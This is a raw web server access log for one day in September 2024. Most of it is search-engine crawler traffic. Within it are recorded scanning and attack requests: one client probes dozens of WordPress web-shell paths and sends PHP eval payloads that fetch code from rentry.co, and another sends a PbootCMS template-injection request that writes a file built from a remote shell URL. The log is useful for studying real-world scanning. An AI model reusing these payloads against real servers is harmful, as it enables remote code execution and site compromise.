66.249.66.36 - - [14/Sep/2024:00:09:44 +0800] "GET /icons/apache_pb.png HTTP/1.1" 200 9691 "-" "Googlebot-Image/1.0" 66.249.66.38 - - [14/Sep/2024:00:31:14 +0800] "GET /icons/pdf.png HTTP/1.1" 200 304 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:00:49:01 +0800] "GET /logs/access_20231220.log HTTP/1.1" 200 7058 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:00:49:02 +0800] "GET /logs/access_20240605.log HTTP/1.1" 200 10539 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:00:50:14 +0800] "GET /icons/pie4.gif HTTP/1.1" 200 193 "-" "Googlebot-Image/1.0" 66.249.66.38 - - [14/Sep/2024:00:50:14 +0800] "GET /icons/pie7.png HTTP/1.1" 200 275 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:01:07:14 +0800] "GET /icons/apache_pb2.png HTTP/1.1" 200 10401 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:01:19:01 +0800] "GET /logs/access_20240616.log HTTP/1.1" 200 24663 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.36 - - [14/Sep/2024:01:25:13 +0800] "GET /icons/small/image.png HTTP/1.1" 200 197 "-" "Googlebot-Image/1.0" 52.167.144.190 - - [14/Sep/2024:01:44:28 +0800] "GET /logs/access_20221102.log HTTP/1.1" 304 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" 66.249.66.38 - - [14/Sep/2024:03:02:54 +0800] "GET /plus/ad_js.php HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 116.179.33.212 - - [14/Sep/2024:03:31:35 +0800] "GET /robots.txt HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 116.179.32.39 - - [14/Sep/2024:03:31:36 +0800] "GET /logs/access_20231228.log HTTP/1.1" 200 27016 "-" "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" 116.179.33.147 - - [14/Sep/2024:03:31:36 +0800] "GET /robots.txt HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.116 Safari/537.36" 66.249.66.38 - - [14/Sep/2024:03:42:10 +0800] "GET /icons/diskimg.png HTTP/1.1" 200 215 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:04:10:04 +0800] "GET /logs/access_20240622.log HTTP/1.1" 200 26288 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.37 - - [14/Sep/2024:04:12:00 +0800] "GET /icons/comp.gray.gif HTTP/1.1" 200 246 "-" "Googlebot-Image/1.0" 43.163.217.235 - - [14/Sep/2024:04:28:58 +0800] "GET /logs/access_20210425.log HTTP/1.1" 404 1194 "http://ft.kidcastle.com.cn/" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0" 43.163.217.235 - - [14/Sep/2024:04:29:01 +0800] "GET / HTTP/1.1" 200 794 "http://ft.kidcastle.com.cn" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0" 49.67.203.226 - - [14/Sep/2024:04:54:18 +0800] "GET /logs/access_20240411.log HTTP/1.1" 200 261388 "https://www.baidu.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 49.67.203.226 - - [14/Sep/2024:04:54:19 +0800] "GET /logs/access_20231125.log HTTP/1.1" 200 220801 "https://www.baidu.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 49.67.203.226 - - [14/Sep/2024:04:54:30 +0800] "GET /logs/access_20240411.log HTTP/1.1" 200 261388 "https://www.baidu.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" 66.249.66.38 - - [14/Sep/2024:04:55:04 +0800] "GET /logs/access_20230925.log HTTP/1.1" 200 9159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 193.203.8.92 - - [14/Sep/2024:04:59:33 +0800] "GET /logs/access_20210425.log HTTP/1.1" 404 1194 "http://ft.kidcastle.com.cn/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 193.203.8.92 - - [14/Sep/2024:04:59:33 +0800] "GET / HTTP/1.1" 200 794 "http://ft.kidcastle.com.cn" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 193.203.8.92 - - [14/Sep/2024:04:59:35 +0800] "GET /?C=M;O=A HTTP/1.1" 200 794 "http://ft.kidcastle.com.cn" "Mozilla/5.0 (Macintosh; Intel Mac OS X 12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36" 121.237.36.29 - - [14/Sep/2024:04:59:55 +0800] "GET / HTTP/1.1" 200 794 "-" "Dalvik/2.1.0 (Linux; U; Android 9.0; ZTE BA520 Build/MRA58K)" 121.237.36.27 - - [14/Sep/2024:05:07:27 +0800] "GET / HTTP/1.1" 200 794 "-" "Mozilla/5.0 (Linux; U; Android 7.1.2; zh-CN; vivo X9s Plus Build/N2G47H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.108 UCBrowser/12.0.4.984 Mobile Safari/537.36" 66.249.66.36 - - [14/Sep/2024:05:10:36 +0800] "GET /icons/uu.png HTTP/1.1" 200 296 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:05:37:15 +0800] "GET /gongkai/channel_63899ceb375991828262a208/ HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET / HTTP/1.1" 200 794 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET //wp-22.php?sfilename=admin.php&sfilecontent=%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?>&supfiles=admin.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET //rindex.php?action=add¶meter=admin.php%7Chttps://rentry.co/3fpi77xv/raw HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET //admin.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET //chosen.php?p= HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /wp-content/wso.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /dropdown.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /css/index.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /themes.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /wp-content/json.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /wp-includes/wp-class.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /wp-content/plugins/press/wp-class.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /simple.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:02 +0800] "GET /wp-includes/widgets/include.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /atomlib.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /ioxi02.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /class.api.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-content/uploads/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-head.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-content/themes/twenty/twenty.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-content/themes/travel/issue.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-content/index.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-admin/js/widgets/file.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /cong.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-amin/includes/file.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /phpmailer.lang-sv.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /wp-includes/Requests/Text/index.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:03 +0800] "GET /images/plugins.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /cjfuns.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /nf_tracking.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wso.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-seo.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /about.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-admin/includes/themes.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /warm.PhP7 HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-content/themes/include.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-content/plugins/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-includes/ID3/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /bless.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-admin/admin-ajax.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /goat11.PhP7 HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:04 +0800] "GET /wp-content/tmpls.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:05 +0800] "GET //wander.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:03:05 +0800] "GET /bs1.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET / HTTP/1.1" 200 794 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //wp-content/plugins/download-plugin/wp-access.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //sample.php?pd=1&mapname=admin.php&a=vx000&dstr=%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?> HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //general.php?pd=1&mapname=admin.php&a=vx000&dstr=%27;%20eval(\"$ok\"%20.%20get(%27https://rentry.co/zokvg2mi/raw%27));%20?> HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //admin.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //about.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //wp-content/plugins/elementor/includes/settings/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //wp-content/plugins/elementor/includes/settings/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //wp-content/themes/aahana/json.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //wp-content/themes/hideo/network.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:25 +0800] "GET //link.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-includes/images/smilies/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-includes/js/codemirror/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-admin/js/widgets/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-includes/images/media/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-admin/css/colors/modern/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-includes/images/crystal/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-content/plugins/elementor/includes/settings/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-content/plugins/elementor/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-admin/css/colors/sunrise/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-admin/css/classwithtostring.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-content/themes/digital-download/new.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-content/languages/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-includes/js/tinymce/themes/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:26 +0800] "GET //wp-content/plugins/xt/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET //wp-content/plugins/akismet/views/?p= HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET //wp-admin/css/colors/midnight/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET //wp-admin/css/colors/ocean/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET //wp-content/plugins/core-plugin/ HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET //wp-includes/Requests/network.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET //wp-pano.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET /wp-includes/theme-compat/network.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET /.well-known/acme-challenge/xmrlpc.php?p= HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET /.well-known/pki-validation/xmrlpc.php?p= HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET /wp-l0gin.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET /delete3.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:27 +0800] "GET /classwithtostring.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET /shellv3.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET /mar.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET /item.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET /content.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET /moon.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET //wp-includes/ID3/plugins.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET //mah.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET ///ss.php?u_p=111222aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL292YS10b29scy9vdmF0L21haW4v222333 HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET //wp-content/packed.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 13.229.107.79 - - [14/Sep/2024:06:10:28 +0800] "GET //wp-includes/css/dist/niil.php HTTP/1.1" 404 1052 "-" "Go-http-client/1.1" 66.249.66.36 - - [14/Sep/2024:06:57:11 +0800] "GET /robots.txt HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:06:57:11 +0800] "GET /logs/access_20230518.log HTTP/1.1" 200 9222 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.36 - - [14/Sep/2024:07:43:14 +0800] "GET /icons/folder.sec.gif HTTP/1.1" 200 243 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:07:56:09 +0800] "GET /logs/access_20230706.log HTTP/1.1" 200 27752 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 198.98.50.244 - - [14/Sep/2024:08:16:34 +0800] "GET /?tag&tagstpl=news.html&tag=%7Bpbohome/Indexot:if((get/*-*/(/**/t))/**/(get/*-*/(/**/t1),get/*-*/(/**/t2)(get/*-*/(/**/t3))))%7Dok%7B/pbohome/Indexot:if%7D&t=file_put_contents&t1=indexbak.php&t2=file_get_contents&t3=http://77js.net/shell/poc.txt HTTP/1.1" 200 794 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0" 198.98.50.244 - - [14/Sep/2024:08:16:34 +0800] "GET /indexbak.php HTTP/1.1" 404 1052 "-" "Mozilla/5.0 (Windows NT 6.1; rv:25.0) Gecko/20100101 Firefox/2X.0" 66.249.66.38 - - [14/Sep/2024:08:27:11 +0800] "GET /logs/access_20230917.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.36 - - [14/Sep/2024:08:39:15 +0800] "GET /logs/access_20240422.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.37 - - [14/Sep/2024:09:39:08 +0800] "GET /icons/forward.gif HTTP/1.1" 200 219 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:10:09:08 +0800] "GET /icons/down.png HTTP/1.1" 200 256 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:10:30:00 +0800] "GET /logs/access_20231014.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.37 - - [14/Sep/2024:10:32:01 +0800] "GET /logs/access_20240317.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:10:32:02 +0800] "GET /logs/access_20230504.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.36 - - [14/Sep/2024:10:33:02 +0800] "GET /logs/access_20240816.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.36 - - [14/Sep/2024:10:34:03 +0800] "GET /logs/access_20240419.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:10:34:03 +0800] "GET /logs/access_20230410.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.38 - - [14/Sep/2024:10:43:14 +0800] "GET /icons/icon.sheet.gif HTTP/1.1" 200 11977 "-" "Googlebot-Image/1.0" 66.249.66.38 - - [14/Sep/2024:11:27:15 +0800] "GET /icons/down.gif HTTP/1.1" 200 163 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:11:44:10 +0800] "GET /logs/access_20230219.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.37 - - [14/Sep/2024:11:55:14 +0800] "GET /icons/small/forward.png HTTP/1.1" 200 174 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:12:32:14 +0800] "GET /icons/back.png HTTP/1.1" 200 308 "-" "Googlebot-Image/1.0" 66.249.66.37 - - [14/Sep/2024:13:07:14 +0800] "GET /icons/movie.gif HTTP/1.1" 200 243 "-" "Googlebot-Image/1.0" 66.249.66.36 - - [14/Sep/2024:13:48:10 +0800] "GET /logs/access_20221128.log HTTP/1.1" 304 - "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.137 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" 66.249.66.37 - - [14/Sep/2024:14:02:15 +0800] "GET /icons/odf6oti.png HTTP/1.1" 200 1107 "-" "Googlebot-Image/1.0" 165.227.173.137 - - [14/Sep/2024:14:03:58 +0800] "GET /logs/access_20210425.log HTTP/1.1" 404 1194 "http://ft.kidcastle.com.cn/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71" 165.227.173.137 - - [14/Sep/2024:14:04:04 +0800] "GET / HTTP/1.1" 200 794 "http://ft.kidcastle.com.cn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71" 165.227.173.137 - - [14/Sep/2024:14:05:03 +0800] "GET /?C=M;O=A HTTP/1.1" 200 794 "http://ft.kidcastle.com.cn" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.1264.71" 165.227.173.137 - - [14/Sep/2024:14:05:20 +0800] "GET /?C=M;O=A HTTP/1.1" 200 794 "http://ft.kidcastle.com.cn" "Mozilla/5.0 (Windows NT 